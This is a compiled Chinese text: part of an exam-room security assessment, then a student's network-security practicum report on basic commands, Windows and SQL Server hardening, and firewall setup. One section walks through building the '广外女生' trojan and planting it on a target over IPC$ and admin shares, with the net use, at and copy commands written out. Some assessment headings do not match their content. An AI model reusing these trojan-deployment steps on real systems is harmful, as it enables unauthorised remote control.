完善系統(tǒng)的角色、權(quán)限分配有記錄；記錄用戶賬戶的變更、修改、注銷(xiāo)（半年記錄情況）；關(guān)鍵應(yīng)用系統(tǒng)的數(shù)據(jù)功能操作迚行審計(jì)；制定針對(duì)關(guān)鍵應(yīng)用系統(tǒng)的應(yīng)急預(yù)案；關(guān)鍵應(yīng)用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更；新系統(tǒng)上線前應(yīng)嚴(yán)格按照相關(guān)標(biāo)準(zhǔn)迚行安全性測(cè)試。

對(duì)考試的機(jī)房迚行“網(wǎng)絡(luò)與通信安全”評(píng)估。（1）評(píng)估說(shuō)明

按標(biāo)準(zhǔn)部署身份認(rèn)證系統(tǒng)、安全管理平臺(tái)、針對(duì)安全設(shè)備的日志服務(wù)器，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年迚行一次信息安全風(fēng)險(xiǎn)評(píng)估。

（2）評(píng)估內(nèi)容

沒(méi)有部署身份認(rèn)證系統(tǒng)、安全管理平臺(tái)，沒(méi)有漏洞掃描系統(tǒng)，重要系統(tǒng)沒(méi)有迚行信息安全風(fēng)險(xiǎn)評(píng)估，沒(méi)有部署針對(duì)安全設(shè)備的日志服務(wù)器。

（3）評(píng)估分析報(bào)告

按標(biāo)準(zhǔn)部署身份認(rèn)證系統(tǒng)、安全管理平臺(tái)、針對(duì)安全設(shè)備的日志服務(wù)器，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年迚行一次信息安全風(fēng)險(xiǎn)評(píng)估。

（4）評(píng)估建議

部署身份認(rèn)證系統(tǒng)、安全管理平臺(tái)，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年內(nèi)迚行信息安全風(fēng)險(xiǎn)評(píng)估，部署針對(duì)安全設(shè)備的日志服務(wù)器。

信息安全評(píng)估：

對(duì)考試的機(jī)房迚行“日志與統(tǒng)計(jì)安全”評(píng)估。（1）評(píng)估說(shuō)明

每天計(jì)算機(jī)上機(jī)記錄日志在冊(cè)，對(duì)系統(tǒng)迚行不定時(shí)的還原。對(duì)本局半年內(nèi)發(fā)生的較大的、或者發(fā)生次數(shù)較多的信息安全事件迚行匯總記錄，形成本單位的安全事件列表

（2）評(píng)估內(nèi)容

已成立了信息安全領(lǐng)導(dǎo)機(jī)構(gòu)，但尚未成立信息安全工作機(jī)構(gòu)。

（3）評(píng)估分析報(bào)告

局域網(wǎng)核心交換設(shè)備、城域網(wǎng)核心路由設(shè)備應(yīng)采取設(shè)備冗余或準(zhǔn)備備用設(shè)備，不允許外聯(lián)鏈路繞過(guò)防火墻，具有當(dāng)前準(zhǔn)確的網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)圖

（4）評(píng)估建議

完善信息安全組織機(jī)構(gòu)，成立信息安全工作機(jī)構(gòu)。

第五篇：【企業(yè)網(wǎng)絡(luò)】網(wǎng)絡(luò)信息安全報(bào)告

XX中型企業(yè)網(wǎng)安全 網(wǎng)絡(luò)信息安全報(bào)告

一、實(shí)驗(yàn)?zāi)康募耙?/p>

該專(zhuān)周的目標(biāo)是讓學(xué)生掌握網(wǎng)絡(luò)安全的基本框架，網(wǎng)絡(luò)安全的基本理論。以及了解計(jì)算機(jī)網(wǎng)絡(luò)安全方面的管理、配置和維護(hù)。

本課程要求在理論教學(xué)上以必需夠用為原則，應(yīng)盡量避免過(guò)深過(guò)繁的理論探討，重在理解網(wǎng)絡(luò)安全的基本框架，網(wǎng)絡(luò)安全的基本理論。掌握數(shù)據(jù)加密、防火墻技術(shù)、入侵檢測(cè)技術(shù)以及學(xué)習(xí)網(wǎng)絡(luò)病毒防治。了解Windows 2000的安全、Web的安全、網(wǎng)絡(luò)安全工程以及黑客常用的系統(tǒng)攻擊方法。本課程要求學(xué)生對(duì)計(jì)算機(jī)的使用有一定了解（了解Windows的使用，具有鍵盤(pán)操作和文件處理的基礎(chǔ)），并已經(jīng)掌握計(jì)算機(jī)網(wǎng)絡(luò)的基本原理。

二、專(zhuān)周內(nèi)容

1、安全需求分析

（1）網(wǎng)絡(luò)安全問(wèn)題主要集中在對(duì)服務(wù)器的安全保護(hù)、防黑客和病毒、重要網(wǎng)段的保護(hù)及管理安全上。因此，我們必須采取相應(yīng)的安全措施杜絕安全隱患，其中應(yīng)該做到：

A、公開(kāi)服務(wù)器的安全保護(hù) B、防止黑客從外部攻擊 C、入侵檢測(cè)與監(jiān)控 D、病毒防護(hù) E、數(shù)據(jù)安全保護(hù) F、網(wǎng)絡(luò)的安全管理

（2）解決網(wǎng)絡(luò)安全問(wèn)題的一些要求

A、大幅度地提高系統(tǒng)的安全性（重點(diǎn)是可用性和可控性）；

B、保持網(wǎng)絡(luò)原有的特點(diǎn)，即對(duì)網(wǎng)絡(luò)的協(xié)議和傳輸具有良好的透明性，能透明接入，無(wú)需更改網(wǎng)絡(luò)設(shè)置；

C、易于操作、維護(hù)，并便于自動(dòng)化管理，而不增加或少增加附加操作；

D、盡量不影響原網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)，同時(shí)便于系統(tǒng)及系統(tǒng)功能的擴(kuò)展；

E、安全保密系統(tǒng)具有較好的性能價(jià)格比。一次性投資，可以長(zhǎng)期使用；

F、安全產(chǎn)品具有合法性，及經(jīng)過(guò)國(guó)家有關(guān)管理部門(mén)的認(rèn)可或認(rèn)證；

（3）系統(tǒng)安全目標(biāo)

A、建立一套完整可行的網(wǎng)絡(luò)安全與網(wǎng)絡(luò)管理策略；

B、將內(nèi)部網(wǎng)絡(luò)、公開(kāi)服務(wù)器網(wǎng)絡(luò)和外網(wǎng)進(jìn)行有效隔離，避免與外部網(wǎng)絡(luò)直接通信；

C、建立網(wǎng)站各主機(jī)和服務(wù)器的安全保護(hù)措施，保證他們的系統(tǒng)安全；

D、加強(qiáng)合法用戶的訪問(wèn)認(rèn)證，同時(shí)將用戶的訪問(wèn)權(quán)限控制在最低限度；

E、全面監(jiān)視對(duì)公開(kāi)服務(wù)器的訪問(wèn)，及時(shí)發(fā)現(xiàn)和拒絕不安全的操作和黑客攻擊行為；

F、加強(qiáng)對(duì)各種訪問(wèn)的審計(jì)工作，詳細(xì)記錄對(duì)網(wǎng)絡(luò)、公開(kāi)服務(wù)器的訪問(wèn)行為，形成完整的系統(tǒng)日志；

2、網(wǎng)絡(luò)拓?fù)?/p>

3、網(wǎng)絡(luò)安全的基本內(nèi)容

（1）基本網(wǎng)絡(luò)命令

A、ping命令： ping –t IP，向指定的計(jì)算機(jī)不停的發(fā)送數(shù)據(jù)包，按Ctr+Break快捷鍵可以查看統(tǒng)計(jì)信息并繼續(xù)運(yùn)行，按 Ctr+C可中止運(yùn)行。

B、Tracert命令：tracert IP 顯示從本地計(jì)算機(jī)到目標(biāo)服務(wù)器所經(jīng)過(guò)的計(jì)算機(jī)：

C、pathping pop.pcpop.com 除了顯示路由外，還提供325S的分析，計(jì)算丟失包的%

（2）操作系統(tǒng)安全

A、屏蔽不需要的服務(wù)組件

開(kāi)始——程序——管理工具——服務(wù) 出現(xiàn)以下窗口：

然后在該對(duì)話框中選中需要屏蔽的程序，并單擊右鍵，然后選擇“停止”命令，同時(shí)將“啟動(dòng)類(lèi)型”設(shè)置為“手動(dòng)”或“已禁用”，這樣就可以對(duì)指定的服務(wù)組進(jìn)行屏蔽了。B、關(guān)閉默認(rèn)共享：“開(kāi)始”——“程序”——“管理工具”——“服務(wù)”——“Server”

（3）數(shù)據(jù)庫(kù)系統(tǒng)安全

A、使用安全的帳號(hào)策略和Windows認(rèn)證模式

由于SQL Server不能更改sa用戶名稱，也不能刪除這個(gè)超級(jí)用戶，所以，我們必須對(duì)這個(gè)帳號(hào)進(jìn)行最強(qiáng)的保護(hù)，當(dāng)然，包括使用一個(gè)非常強(qiáng)壯的密碼，最好不要在數(shù)據(jù)庫(kù)應(yīng)用中使用sa帳號(hào)，只有當(dāng)沒(méi)有其它方法登錄到 SQL Server 實(shí)例(例如，當(dāng)其它系統(tǒng)管理員不可用或忘記了密碼)時(shí)才使用 sa?？梢孕陆⒁粋€(gè)擁有與sa一樣權(quán)限的超級(jí)用戶來(lái)管理數(shù)據(jù)庫(kù)。安全的帳號(hào)策略還包括不要讓管理員權(quán)限的帳號(hào)泛濫。

SQL Server的認(rèn)證模式有Windows身份認(rèn)證和混合身份認(rèn)證兩種。在任何可能的時(shí)候，應(yīng)該對(duì)指向SQL Server的連接要求Windows身份驗(yàn)證模式。

Windows認(rèn)證模式比混合模式更優(yōu)越，原因在以下：

1)它通過(guò)限制對(duì)Microsoft Windows用戶和域用戶帳戶的連接，保護(hù)SQL Server免受大部分Internet工具的侵害。

2)服務(wù)器將從Windows安全增強(qiáng)機(jī)制中獲益，例如更強(qiáng)的身份驗(yàn)證協(xié)議以及強(qiáng)制的密碼復(fù)雜性和過(guò)期時(shí)間。

3)使用Windows認(rèn)證，不需要將密碼存放在連接字符串中。存儲(chǔ)密碼是使用標(biāo)準(zhǔn)SQL Server登錄的應(yīng)用程序的主要漏洞之一。

4)Windows認(rèn)證意味著你只需要將密碼存放在一個(gè)地方。

要在SQL Server的Enterprise Manager安裝Windows身份驗(yàn)證模式，步驟操作： 展開(kāi)服務(wù)器組——右鍵點(diǎn)擊服務(wù)器——然后點(diǎn)擊“屬性”——在安全性選項(xiàng)卡的身份驗(yàn)證中——點(diǎn)擊“僅限Windows”。（4）網(wǎng)絡(luò)防火墻工具：紅墻主機(jī)網(wǎng)絡(luò)防火墻 安裝

1.具體操作如下：

第一步： 將“愛(ài)思紅墻主機(jī)網(wǎng)絡(luò)防火墻”的安裝光盤(pán)插入驅(qū)動(dòng)器，運(yùn)行根目錄下的Setup文件來(lái)運(yùn)行其安裝程序，進(jìn)入“愛(ài)思紅墻主機(jī)網(wǎng)絡(luò)防火墻安裝”窗口；

第二步：

在“歡迎安裝愛(ài)思紅墻主機(jī)網(wǎng)絡(luò)防火墻”對(duì)話框中，單擊“下一步”按鈕；

第三步： 在“軟件許可協(xié)議”對(duì)話框，接受協(xié)議點(diǎn)擊“是”；

第四步： 點(diǎn)擊“是”按鈕，出現(xiàn)顯示您計(jì)算機(jī)的相關(guān)信息，即判斷是否可以安裝本軟件；

第五步： 單擊“下一步”按鈕，出現(xiàn)“選擇目標(biāo)位置”對(duì)話框；

第六步： 在該對(duì)話框中，單擊“瀏覽”按鈕，并在“選擇文件夾”對(duì)話框中選擇盤(pán)符作為驅(qū)動(dòng)器，再指定相應(yīng)的文件夾及路徑，然后單擊“確定”按鈕；

第七步： 單擊“下一步”按鈕，出現(xiàn)“選擇安裝程序名稱”對(duì)話框，您可自定義程序名稱；

第八步： 單擊“下一步”按鈕，系統(tǒng)開(kāi)始復(fù)制文件；

第九步： 進(jìn)入“紅墻主機(jī)網(wǎng)絡(luò)防火墻配置”窗口，作出是否運(yùn)行“紅墻應(yīng)用程序掃描系統(tǒng)”的選擇后，點(diǎn)擊“完成”。

相關(guān)設(shè)置：告警設(shè)置：系統(tǒng)提供了兩種情況下的告警，即需要系統(tǒng)告警和不需要系統(tǒng)告警，您可據(jù)需要選取告警設(shè)置。

點(diǎn)擊主界面中的“規(guī)則管理”按鈕，彈出相應(yīng)窗口，如下圖：

網(wǎng)絡(luò)監(jiān)控中心：

（5）網(wǎng)絡(luò)攻擊工具：“廣外女生”

它的基本功能有：文件管理方面有上傳，下載，刪除，改名，設(shè)置屬性，建立文件夾和運(yùn)行指定文件等功能；注冊(cè)表操作方面：全面模擬WINDOWS的注冊(cè)表編輯器，讓遠(yuǎn)程注冊(cè)表編輯工作有如在本機(jī)上操作一樣方便；屏幕控制方面：可以自定義圖片的質(zhì)量來(lái)減少傳輸?shù)臅r(shí)間，在局域網(wǎng)或高網(wǎng)速的地方還可以全屏操作對(duì)方的鼠標(biāo)及鍵盤(pán)，就像操縱自己的計(jì)算機(jī)一樣；遠(yuǎn)程任務(wù)管理方面，可以直觀地瀏覽對(duì)方窗體，隨意殺掉對(duì)方窗體或其中的控件；其他功能還有郵件IP通知等。

主要步驟：首先運(yùn)行“gwg.exe”，出現(xiàn)如圖窗口：

選中“服務(wù)端設(shè)置”，生成“GDUFS.exe”木馬：

然后將“GDUFS.exe”復(fù)制到自己的C盤(pán)中，再根據(jù)一些命令把“GDUFS.exe”復(fù)制到目標(biāo)主機(jī)的盤(pán)中，再進(jìn)行運(yùn)行。目標(biāo)主機(jī)的IP：191.168.12.38 具體步驟及命令：

“開(kāi)始”——“運(yùn)行”——“cmd”

命令：net use 191.168.12.38ipc$ 123 /user:administrator 與目標(biāo)主機(jī)之間建立聯(lián)系

命令：net time 191.168.12.38 獲取目標(biāo)主機(jī)的時(shí)間

命令：at 191.168.12.38 08:21 net share c$=c: 與目標(biāo)主機(jī)的C盤(pán)建立通道

命令：copy c:GDUFS.exe 191.168.12.38c$ 復(fù)制“GDUFS.exe”文件到目標(biāo)主機(jī)的C盤(pán)中：

命令：191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目標(biāo)主機(jī)中什么時(shí)候運(yùn)行。

三、專(zhuān)周小結(jié)：

通過(guò)這次網(wǎng)絡(luò)安全專(zhuān)周，我不僅僅是學(xué)到了很多知識(shí)，更是透徹的理解到了網(wǎng)絡(luò)安全對(duì)生活已經(jīng)將來(lái)工作的意義。

網(wǎng)絡(luò)安全分為軟件網(wǎng)絡(luò)安全和硬件網(wǎng)絡(luò)安全。一般我們說(shuō)的網(wǎng)絡(luò)安全就是軟件上的網(wǎng)絡(luò)安全，即局域網(wǎng)，互聯(lián)網(wǎng)安全。

網(wǎng)絡(luò)安全又分為內(nèi)網(wǎng)安全和外網(wǎng)安全。在內(nèi)外網(wǎng)安全中，內(nèi)網(wǎng)安全則是重中之重。畢竟是家賊難防。據(jù)不完全統(tǒng)計(jì)，全國(guó)因?yàn)閮?nèi)網(wǎng)安全的問(wèn)題，至少每年算是幾億美元。所以，網(wǎng)絡(luò)安全特別重要。

至于在將來(lái)的工作中，我們也要嚴(yán)格尊市網(wǎng)絡(luò)設(shè)備管理原則和使用秩序，對(duì)設(shè)備進(jìn)行統(tǒng)一管理專(zhuān)人負(fù)責(zé)，嚴(yán)格要求自己對(duì)設(shè)備進(jìn)行安全操作，保持強(qiáng)烈的責(zé)任感和服務(wù)意識(shí)，做好每一個(gè)細(xì)節(jié)，重點(diǎn)做好以下幾項(xiàng)工作：

1，及時(shí)準(zhǔn)確判斷網(wǎng)絡(luò)故障，做好上門(mén)維護(hù)工作或及時(shí)提醒網(wǎng)絡(luò)合作商進(jìn)行維護(hù)。

2，定期檢查維護(hù)各網(wǎng)絡(luò)設(shè)備的運(yùn)行情況并進(jìn)行維護(hù)。3，不定期對(duì)服務(wù)器進(jìn)行更新和檢查。

4，遇到特殊情況，及時(shí)向領(lǐng)導(dǎo)和老師匯報(bào)，努力提高應(yīng)急處理問(wèn)題和獨(dú)立處理問(wèn)題的能力。

感謝老師對(duì)我們的教導(dǎo)。